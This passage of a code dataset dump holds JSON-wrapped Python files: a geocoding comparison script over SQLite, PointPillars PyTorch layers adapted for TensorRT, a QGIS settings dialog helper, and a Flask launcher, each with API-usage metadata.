"proximus.tools.Platform.Platform.PLATFORM_LINUX_DREAMPLUG", "line_number": 52, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGN_HOTSPOT", "line_number": 53, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 53, "usage_type": "name"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor.openHotspotPortal", "line_number": 54, "usage_type": "call"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor", "line_number": 54, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGN_NO_INTERNET", "line_number": 55, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 55, "usage_type": "name"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor.openCaptiveOrLimitedPortal", "line_number": 56, "usage_type": "call"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor", "line_number": 56, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGN_LIMITED", "line_number": 57, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 57, 
"usage_type": "name"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor.openCaptiveOrLimitedPortal", "line_number": 58, "usage_type": "call"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor", "line_number": 58, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGN_FACEBOOK", "line_number": 59, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 59, "usage_type": "name"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor.openFacebookPortal", "line_number": 60, "usage_type": "call"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor", "line_number": 60, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGNS_FILE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 69, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGNS_FILE", "line_number": 70, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 70, "usage_type": "call"}, {"api_name": "proximus.tools.XMLUtils.XMLUtils.readNodeFromFile", "line_number": 73, "usage_type": "call"}, {"api_name": "proximus.tools.XMLUtils.XMLUtils", "line_number": 73, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGNS_FILE", "line_number": 73, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 73, "usage_type": "name"}, {"api_name": "proximus.tools.XMLUtils.XMLUtils.elementToString", "line_number": 80, "usage_type": "call"}, {"api_name": "proximus.tools.XMLUtils.XMLUtils", "line_number": 80, "usage_type": "name"}, {"api_name": "proximus.tools.SystemWriter.SystemWriter.readFileToString", "line_number": 81, "usage_type": "call"}, {"api_name": "proximus.tools.SystemWriter.SystemWriter", "line_number": 81, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGNS_FILE", "line_number": 81, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 81, "usage_type": "name"}, {"api_name": "proximus.tools.XMLUtils.XMLUtils.writeNodeToFile", "line_number": 83, "usage_type": "call"}, {"api_name": "proximus.tools.XMLUtils.XMLUtils", "line_number": 83, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGNS_FILE", "line_number": 83, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 83, "usage_type": "name"}, {"api_name": "proximus.data.Campaign.Campaign", "line_number": 91, "usage_type": "argument"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_WIFI", "line_number": 110, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 110, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_BLUETOOTH", "line_number": 112, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 112, "usage_type": "name"}, {"api_name": 
"proximus.data.Campaign.Campaign", "line_number": 125, "usage_type": "call"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGNS_ROOT_DIR", "line_number": 135, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 135, "usage_type": "name"}, {"api_name": "os.sep", "line_number": 135, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 137, "usage_type": "call"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_WIFI", "line_number": 155, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 155, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_BLUETOOTH", "line_number": 156, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 156, "usage_type": "name"}, {"api_name": "proximus.handlers.GenericCampaignDownloader.GenericCampaignDownloader", "line_number": 159, "usage_type": "call"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_WIFI", "line_number": 159, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 159, "usage_type": "name"}, {"api_name": "proximus.handlers.GenericCampaignDownloader.GenericCampaignDownloader", "line_number": 165, "usage_type": "call"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_BLUETOOTH", "line_number": 165, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 165, "usage_type": "name"}]} +{"seq_id": "203814732", "text": "#!/bin/bash\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# Author: Deontae Lafayette\t\t\t\t\t\t\t\t\t\t#\n# Institution: University of Florida\t\t\t\t\t\t\t#\n# Department: Electrical Engineering\t\t\t\t\t\t\t#\n# Lab: ACIS (Advanced Computing and Information Systems)\t\t#\n#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nfrom __future__ import division\nimport csv, sqlite3, os, urllib, requests, json, configparser, sys\n\n# Information Logging\ndef log(message, logfile):\n\twith open(logfile, 'a') as file:\n\t\tfile.write('%s\\n' % (message))\n\tfile.close()\n\n#Connect to sqlite database\ndef populateDatabase():\n\t# Open CSV\n\tprint(\"Building Database . . 
.\")\n\twith open('location_fields.csv', 'rb') as csvfile:\n\t\t# Loop through CSV and Set name = uuidentifier key = headerName value = csvValue \n\t\tcsvreader = csv.reader(csvfile, dialect='excel')\n\t\trow = 0\n\t\tfor line in csvreader:\n\t\t\tif row == 0: \n\t\t\t\theader = line\n\t\t\t\tplaceholders = '?'\n\t\t\t\tplaceholders= ', '.join(placeholders for unused in header)\n\t\t\t\tquery = \"CREATE TABLE %s %s\" % (TEMPTABLENAME, tuple(header)) \n\t\t\t\tcur.execute(query)\n\t\t\t\t#log(\"Staged Query: %s\" % (query), infoLog)\n\t\t\t\trow += 1\n\t\t\telse:\n\t\t\t\tplaceholders = '?'\n\t\t\t\tplaceholders= ', '.join(placeholders for unused in line)\n\t\t\t\tquery = \"INSERT INTO %s VALUES (%s)\" % (TEMPTABLENAME, placeholders)\n\t\t\t\t#print line\n\t\t\t\t#print query\n\t\t\t\tcur.execute(query, tuple(line))\n\t\t\t\t#log(\"Staged Query: %s\" % (query), infoLog)\n\t# Close CSV\n\tcsvfile.close()\n\tcon.commit()\n\tlog(\"\\tChanges Committed to DataBase\", infoLog)\n\tprint(\"Complete!\")\n\t\n\treturn 1\n\ndef exportTable(dbName, tableName):\n\twith open('newcsv.csv', 'wb') as csvfile:\n\t\tcsvwriter = csv.writer(csvfile, dialect='excel')\n\t\tfor res in cur.execute(\"SELECT * FROM %s\") % (TEMPTABLENAME):\n\t\t\tcsvwriter.writerow(res) \n\t\n\tcsvfile.close()\n\treturn 1\n\t\ndef getUniqueCoordinates():\n\tprint(\"Building Unique Coordinate List . . . \")\n\tcoordinateList = []\n\tquery = \"SELECT decimalLatitude, decimalLongitude FROM %s\" % (TEMPTABLENAME)\n\tfor res in cur.execute(query):\n\t\tcoordinateList.append(', '.join(map(str, res)))\n\ttempSet = set(coordinateList)\n\tuniqueCoordinateList = list(tempSet)\n\t\n\tprint(\"Complete!\")\n\treturn uniqueCoordinateList\n\ndef updateRecord(value, lat, long, column):\n\t\n\tquery = \"UPDATE %s SET %s='%s' WHERE decimalLatitude='%s' AND decimalLongitude='%s'\" % (TEMPTABLENAME, column, value, lat, long)\t\n\treturn cur.execute(query)\n\t\ndef getRecord(lat, long, column='*'):\n\tquery = \"SELECT %s FROM %s WHERE decimalLatitude='%s' AND decimalLongitude='%s'\" % (column, TEMPTABLENAME, lat, long)\n\treturn cur.execute(query)\n\t\ndef dstkCompare(coordinates, URL):\n\tprint(\"Comparing Records . . 
.\")\n\t\n\tfor pair in coordinates:\n\t\tlat, long = pair.split(',')\n\t\tlat = lat.strip()\n\t\tlong = long.strip()\n\t\t#print lat\n\t\t#print long\n\t\tencodedCoordinates = urllib.quote(pair)\n\t\thttpAddress = URL + encodedCoordinates\n\t\t#print httpAddress\n\t\treq = requests.request('GET', httpAddress)\n\t\t#print req.text\n\t\tjsonData = json.loads(req.text)\n\t\tif jsonData[0]['politics']:\n\t\t\tx = 0\n\t\t\twhile x < len(jsonData[0]['politics']): # Loop through all data\n\t\t\t\tif jsonData[0]['politics'][x]['friendly_type'] == 'state': # if data type is of state compare state info to existing record.\n\t\t\t\t\tgetRecord(lat, long, 'stateProvince')\n\t\t\t\t\tdbValue = ''.join(map(str, cur.fetchone()))\n\t\t\t\t\tdstkValue = jsonData[0]['politics'][x]['name']\n\t\t\t\t\tif dbValue != dstkValue:\n\t\t\t\t\t\tupdateRecord(dstkValue, lat, long, 'stateProvince')\n\t\t\t\t\t\t#print dbValue + ' <<<<>>>> ' + dstkValue + \" %s, %s\" % (lat, long)\n\t\t\t\t\n\t\t\t\telif jsonData[0]['politics'][x]['friendly_type'] == 'city':\n\t\t\t\t\tgetRecord(lat, long, 'municipality')\n\t\t\t\t\tdbValue = ''.join(map(str, cur.fetchone()))\n\t\t\t\t\tdstkValue = jsonData[0]['politics'][x]['name']\n\t\t\t\t\tif dbValue != dstkValue:\n\t\t\t\t\t\tupdateRecord(dstkValue, lat, long, 'municipality')\n\t\t\t\t\t\t#print dbValue + ' <<<<>>>> ' + dstkValue + \" %s, %s\" % (lat, long)\n\t\t\t\t\n\t\t\t\telif jsonData[0]['politics'][x]['friendly_type'] == 'country':\n\t\t\t\t\tgetRecord(lat, long, 'country')\n\t\t\t\t\tdbValue = ''.join(map(str, cur.fetchone()))\n\t\t\t\t\tdstkValue = jsonData[0]['politics'][x]['name']\n\t\t\t\t\tif dbValue != dstkValue:\n\t\t\t\t\t\tupdateRecord(dstkValue, lat, long, 'country')\n\t\t\t\t\t\t#print dbValue + ' <<<<>>>> ' + dstkValue + \" %s, %s\" % (lat, long)\n\t\t\t\t\t\n\t\t\t\tx += 1\n\tcon.commit()\n\tlog(\"\\tChanges Committed to DataBase\", infoLog)\n\treturn 1\n\t\t\t\n#------------------------------Config--------------------------------------#\ndef configSectionMap(section):\n\tdict1 = {}\n\toptions = config.options(section)\n\tfor option in options:\n\t\ttry:\n\t\t\tdict1[option] = config.get(section, option)\n\t\t\tif dict1[option] == -1:\n\t\t\t\tDebugPrint(\"skip: %s\" % option)\n\t\texcept:\n\t\t\tprint(\"exception on %s!\" % option)\n\t\t\tdict1[option] = None\n\treturn dict1\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\n\t\nTEMPDBNAME = configSectionMap(\"DatabaseConfiguration\")['tempdb']\nTEMPTABLENAME = configSectionMap(\"DatabaseConfiguration\")['temptable']\nc2p = configSectionMap(\"DSTKConfiguration\")['c2p']\nerrorLog = configSectionMap(\"Logging\")['error']\ninfoLog = configSectionMap(\"Logging\")['info']\nif not os.path.isfile(TEMPDBNAME):\n\tcon = sqlite3.connect(TEMPDBNAME)\n\tcur = con.cursor()\n\tpopulateDatabase()\n\nelse:\n\tcon = sqlite3.connect(TEMPDBNAME)\n\tcur = con.cursor()\n\t\n#--------------------------END Config-----------------------------------#\n\t\t\n# ----------------------------------------- MAIN --------------------------------- # \nuniqueCoordinateList = getUniqueCoordinates()\ndstkCompare(uniqueCoordinateList, c2p)\n\t\n\n\n\t\n", "sub_path": "modules.py", "file_name": "modules.py", "file_ext": "py", "file_size_in_byte": 5539, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 26, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 55, "usage_type": "call"}, {"api_name": "urllib.quote", 
"line_number": 92, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 95, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 97, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 153, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 158, "usage_type": "call"}]} +{"seq_id": "86568935", "text": "\"\"\"\nPointPillars fork from SECOND.\nCode written by Alex Lang and Oscar Beijbom, 2018.\nLicensed under MIT License [see LICENSE].\n\"\"\"\n\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom second.pytorch.utils import get_paddings_indicator\nfrom torchplus.nn import Empty\nfrom torchplus.tools import change_default_args\nfrom .pointpillars import PFNLayer\n\n\nclass PFNLayerForCudaImplementation(nn.Module):\n def __init__(self,\n in_channels,\n out_channels,\n use_norm=True,\n last_layer=False):\n \"\"\"\n Pillar Feature Net Layer. Add batch size to fit tensorrt\n Modified batchnorm 1d -> 2d to fit tensorrt\n :param in_channels: . Number of input channels.\n :param out_channels: . Number of output channels.\n :param use_norm: . Whether to include BatchNorm.\n :param last_layer: . If last_layer, there is no concatenation of features.\n \"\"\"\n super().__init__()\n self.name = 'PFNLayer'\n self.last_vfe = last_layer\n if not self.last_vfe:\n out_channels = out_channels // 2\n self.units = out_channels\n\n if use_norm:\n # Have to use BatchNorm2d since 1d, 1, 1200000, 64 , 1200000is too long\n BatchNorm1d = change_default_args(eps=1e-3, momentum=0.01)(nn.BatchNorm2d)\n # Linear = change_default_args(bias=False)(nn.Linear)\n Conv = change_default_args(bias=False)(nn.Conv2d)\n else:\n BatchNorm1d = Empty\n # Linear = change_default_args(bias=True)(nn.Linear)\n Conv = change_default_args(bias=False)(nn.Conv2d)\n\n self.norm = BatchNorm1d(self.units)\n self.conv = Conv(in_channels, self.units, 1)\n # replace max\n self.dilaconv = Conv(self.units, self.units, (1, 34), dilation=(1, 3))\n\n def forward(self, inputs):\n # ############# the conversion is obeying the rule:\n ############### tensorrt is not supporting much of indexing, broadcasting, and wired batching\n # the following struct\n # (1, 12000, 100, 4)\n x = self.conv(inputs)\n x = self.norm(x)\n x = F.relu(x)\n # replace max to dilated conv\n # x_max = torch.max(x, dim=1, keepdim=True)[0]\n\n x_max = self.dilaconv(x)\n if self.last_vfe:\n return x_max\n\n\nclass PillarFeatureNetForCudaImplementation(nn.Module):\n def __init__(self,\n num_input_features=4,\n use_norm=True,\n num_filters=(64,),\n with_distance=False,\n voxel_size=(0.2, 0.2, 4),\n pc_range=(0, -40, -3, 70.4, 40, 1)):\n \"\"\"\n Modified Pillar Feature Net to match the c++ codes.\n :param num_input_features: . Number of input features, either x, y, z or x, y, z, r.\n :param use_norm: . Whether to include BatchNorm.\n :param num_filters: (: N). Number of features in each of the N PFNLayers.\n :param with_distance: . Whether to include Euclidean distance to points.\n :param voxel_size: (: 3). Size of voxels, only utilize x and y size.\n :param pc_range: (: 6). 
Point cloud range, only utilize x and y min.\n \"\"\"\n\n super().__init__()\n self.name = 'PillarFeatureNet'\n assert len(num_filters) > 0\n num_input_features += 5\n if with_distance:\n num_input_features += 1\n self._with_distance = with_distance\n\n # Create PillarFeatureNet layers\n num_filters = [num_input_features] + list(num_filters)\n pfn_layers = []\n for i in range(len(num_filters) - 1):\n in_filters = num_filters[i]\n out_filters = num_filters[i + 1]\n if i < len(num_filters) - 2:\n last_layer = False\n else:\n last_layer = True\n pfn_layers.append(PFNLayerForCudaImplementation(in_filters, out_filters, use_norm, last_layer=last_layer))\n self.pfn_layers = nn.ModuleList(pfn_layers)\n\n # Need pillar (voxel) size and x/y offset in order to calculate pillar offset\n self.vx = voxel_size[0]\n self.vy = voxel_size[1]\n self.x_offset = self.vx / 2 + pc_range[0]\n self.y_offset = self.vy / 2 + pc_range[1]\n\n def forward(self,\n dev_pillar_x_, dev_pillar_y_, dev_pillar_z_, dev_pillar_i_,\n dev_num_points_per_pillar_, dev_x_coors_for_sub_shaped_, dev_y_coors_for_sub_shaped_,\n dev_pillar_feature_mask_):\n \"\"\"\n The c++ code inputs\n :param dev_pillar_x_: (2, 1, 12000, 100)\n :param dev_pillar_y_: (2, 1, 12000, 100)\n :param dev_pillar_z_: (2, 1, 12000, 100)\n :param dev_pillar_i_: (2, 1, 12000, 100)\n :param dev_num_points_per_pillar_: num_voxels in pytorch code, (2, 1, 12000), the only one without 100\n :param dev_x_coors_for_sub_shaped_: (2, 1, 12000, 100)\n :param dev_y_coors_for_sub_shaped_: (2, 1, 12000, 100)\n :param dev_pillar_feature_mask_: (2, 1, 12000, 100) point wise mask\n :return:\n \"\"\"\n # train reshape, onnx conersion not necessary\n dev_num_points_per_pillar_= torch.reshape(dev_num_points_per_pillar_, (dev_pillar_x_.shape[0], 1, 12000, 1))\n\n xyz = torch.cat([dev_pillar_x_, dev_pillar_y_, dev_pillar_z_], dim=1)\n xyz_mean = xyz.sum(dim=3, keepdim=True) / dev_num_points_per_pillar_\n xyz_submean = xyz - xyz_mean\n '''\n # check if have nan\n def check_is_nan(input):\n is_nan = torch.isnan(input)\n print(torch.sum(torch.isnan(input)))\n print(input[is_nan][0])\n exit()\n check_is_nan(x_submean)\n '''\n # ############ work above ###############################\n # trt is not supporting broadcasting sometimes\n vx = torch.tensor(self.vx, device=\"cuda\", dtype=torch.float).view(1, 1, 1, 1)\n vy = torch.tensor(self.vy, device=\"cuda\", dtype=torch.float).view(1, 1, 1, 1)\n x_offset = torch.tensor(self.x_offset, device=\"cuda\", dtype=torch.float).view(1, 1, 1, 1)\n y_offset = torch.tensor(self.y_offset, device=\"cuda\", dtype=torch.float).view(1, 1, 1, 1)\n x_center = dev_x_coors_for_sub_shaped_ * vx + x_offset\n y_center = dev_y_coors_for_sub_shaped_ * vy + y_offset\n\n # Find distance of x, y, and z from pillar center\n x_subcenter = dev_pillar_x_ - x_center\n y_subcenter = dev_pillar_y_ - y_center\n features_ls = [xyz, dev_pillar_i_, xyz_submean,\n x_subcenter, y_subcenter]\n\n features = torch.cat(features_ls, dim=1)\n features_masked = features.mul(dev_pillar_feature_mask_)\n\n # Forward pass through PFNLayers\n for pfn in self.pfn_layers:\n features_out = pfn(features_masked)\n # return features_out.squeeze() can not simply squeeze because the batch sometimes is 1!!\n return torch.squeeze(features_out, 3)\n\n\nclass PointPillarsScatterForCudaImpmentation(nn.Module):\n def __init__(self,\n output_shape,\n num_input_features=64):\n \"\"\"\n Point Pillar's Scatter.\n add batch dimension\n :param output_shape: ([int]: 4). 
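As the PillarFeatureNet forward pass above shows, each point is decorated to nine channels: raw x, y, z and intensity, the three offsets from the pillar's point mean, and the two offsets from the pillar's geometric center, which is why the constructor adds 5 to num_input_features. A toy recomputation for a single pillar (sizes and values invented, not taken from the record):

import torch

# One pillar with 3 points; per-point x, y, z, intensity (invented values).
pts = torch.tensor([[0.1, 0.2, 0.0, 0.5],
                    [0.3, 0.2, 0.1, 0.7],
                    [0.2, 0.5, 0.2, 0.6]])

vx, vy = 0.2, 0.2               # voxel (pillar) size
x_off, y_off = vx / 2, vy / 2   # center offsets, as in the constructor
coor_x, coor_y = 0, 1           # this pillar's grid coordinates

xyz = pts[:, :3]
mean_offsets = xyz - xyz.mean(dim=0, keepdim=True)          # 3 channels
center = torch.tensor([coor_x * vx + x_off, coor_y * vy + y_off])
center_offsets = pts[:, :2] - center                        # 2 channels

features = torch.cat([xyz, pts[:, 3:4], mean_offsets, center_offsets], dim=1)
print(features.shape)  # torch.Size([3, 9]): 4 raw + 5 decorated channels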
Required output shape of features.\n :param num_input_features: . Number of input features.\n \"\"\"\n\n super().__init__()\n self.name = 'PointPillarsScatter'\n self.output_shape = output_shape\n self.ny = output_shape[2]\n self.nx = output_shape[3]\n self.nchannels = num_input_features\n\n def forward(self, voxel_features, coords, batch_size):\n # now the voxel_features is (2, 12000, 64) instead of (xxx, 64)\n # batch_canvas will be the final output.\n # [2, 64, 12000] -> [2, 12000, 64]\n voxel_features = voxel_features.permute(0, 2, 1).contiguous()\n batch_canvas = []\n for batch_itt in range(batch_size):\n # Create the canvas for this sample\n canvas = torch.zeros(self.nchannels, self.nx * self.ny, dtype=voxel_features.dtype,\n device=voxel_features.device)\n\n # Only include non-empty pillars\n batch_mask = coords[:, 0] == batch_itt\n this_coords = coords[batch_mask, :]\n non_empty_pillar_num = this_coords.shape[\n 0] # one error: orginal pfe final squeeze is not considering batchsize==1\n # print(\"nonempty pillar num vs feature dims: \", non_empty_pillar_num, voxel_features.shape)\n indices = this_coords[:, 2] * self.nx + this_coords[:, 3]\n indices = indices.type(torch.long)\n\n # take out the batch\n voxels = voxel_features[batch_itt, :non_empty_pillar_num, :]\n voxels = voxels.t()\n # Now scatter the blob back to the canvas.\n canvas[:, indices] = voxels\n # Append to a list for later stacking.\n batch_canvas.append(canvas)\n\n # Stack to 3-dim tensor (batch-size, nchannels, nrows*ncols)\n batch_canvas = torch.stack(batch_canvas, 0)\n\n # Undo the column stacking to final 4-dim tensor\n batch_canvas = batch_canvas.view(batch_size, self.nchannels, self.ny, self.nx)\n return batch_canvas\n", "sub_path": "second/pytorch/models/pointpillars_for_offical_onnx_and_cuda.py", "file_name": "pointpillars_for_offical_onnx_and_cuda.py", "file_ext": "py", "file_size_in_byte": 9373, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torchplus.tools.change_default_args", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torchplus.tools.change_default_args", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torchplus.nn.Empty", "line_number": 44, "usage_type": "name"}, {"api_name": "torchplus.tools.change_default_args", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.reshape", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 133, 
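The scatter class above writes each pillar's feature vector back onto a dense bird's-eye-view grid by flattening the (ny, nx) canvas to nx*ny columns and indexing with the flat offset y*nx + x. A minimal sketch of that scatter for one sample (tiny grid and made-up coordinates):

import torch

nchannels, ny, nx = 4, 3, 5
# Three non-empty pillars: their (y, x) grid coordinates and feature vectors.
coords = torch.tensor([[0, 1], [2, 0], [2, 4]])
voxels = torch.arange(3 * nchannels, dtype=torch.float).view(3, nchannels)

canvas = torch.zeros(nchannels, nx * ny)
indices = (coords[:, 0] * nx + coords[:, 1]).long()  # flat index y*nx + x
canvas[:, indices] = voxels.t()                      # scatter features columnwise

grid = canvas.view(nchannels, ny, nx)                # undo the flattening
print(grid[:, 2, 4])  # features of the pillar at y=2, x=4: tensor([ 8.,  9., 10., 11.])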
"usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 147, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 149, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 150, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.squeeze", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 170, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 206, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 217, "usage_type": "call"}]} +{"seq_id": "121712966", "text": "#-----------------------------------------------------------\n#\n# QGIS Setting Manager\n# Copyright (C) 2016 Denis Rouzaud\n#\n#-----------------------------------------------------------\n#\n# licensed under the terms of GNU GPL 2\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n#---------------------------------------------------------------------\n\nfrom PyQt5.QtWidgets import QDialog, QDoubleSpinBox, QComboBox, QListWidget, QGridLayout\nfrom qgis.core import QgsTolerance\nfrom qgis.gui import QgsCollapsibleGroupBox\nfrom ..setting_dialog import SettingDialog, UpdateMode\nfrom .my_settings import MySettings\n\n\nclass MySettingsDialog(QDialog, SettingDialog):\n def __init__(self, setting_name, widget_class, mode: UpdateMode=UpdateMode.DialogAccept, init_widget=None):\n \"\"\"\n\n :param setting_name:\n :param widget_class:\n :param mode:\n :param init_widget: some initializing code for the widget\n \"\"\"\n\n settings = MySettings()\n\n QDialog.__init__(self, setting_manager=settings, mode=mode)\n SettingDialog.__init__(self, setting_manager=settings, mode=mode)\n\n #super(QDialog, self).__init__(setting_manager=settings, mode=mode)\n self.DEBUG = True\n\n self.widget = widget_class(self)\n self.widget.setObjectName(setting_name)\n\n if init_widget:\n # print(\"running init_widget lambda\")\n init_widget(self.widget)\n\n self.settings = settings\n self.init_widgets()\n", "sub_path": "test/my_settings_dialog.py", "file_name": "my_settings_dialog.py", "file_ext": "py", "file_size_in_byte": 2140, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 33, "usage_type": "name"}, {"api_name": "setting_dialog.SettingDialog", "line_number": 33, "usage_type": "name"}, {"api_name": "setting_dialog.UpdateMode", "line_number": 34, "usage_type": "name"}, {"api_name": "setting_dialog.UpdateMode.DialogAccept", "line_number": 34, "usage_type": "attribute"}, {"api_name": "my_settings.MySettings", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog.__init__", "line_number": 45, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 45, "usage_type": "name"}, {"api_name": "setting_dialog.SettingDialog.__init__", "line_number": 46, "usage_type": "call"}, {"api_name": "setting_dialog.SettingDialog", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "430449279", "text": "import os\nimport socket\n\nfrom config import configs\nfrom freenit import create_app\n\nconfig_name = os.getenv('FLASK_ENV') or 'default'\nconfig = configs[config_name]\napp = create_app(config)\nhostname = socket.gethostname()\nport = os.environ.get('FLASK_PORT', 5000)\nSWAGGER_PATH = f'{config.OPENAPI_URL_PREFIX}{config.OPENAPI_SWAGGER_UI_PATH}'\nSWAGGER_URL = f'http://{hostname}:{port}{SWAGGER_PATH}'\n\nif __name__ == '__main__':\n print(' * Swagger URL:', SWAGGER_URL)\n app.run(\n host='0.0.0.0',\n port=port,\n debug=True,\n use_reloader=True,\n )\n", "sub_path": "wsgi.py", "file_name": "wsgi.py", "file_ext": "py", "file_size_in_byte": 576, "program_lang": "python", "lang": "en", 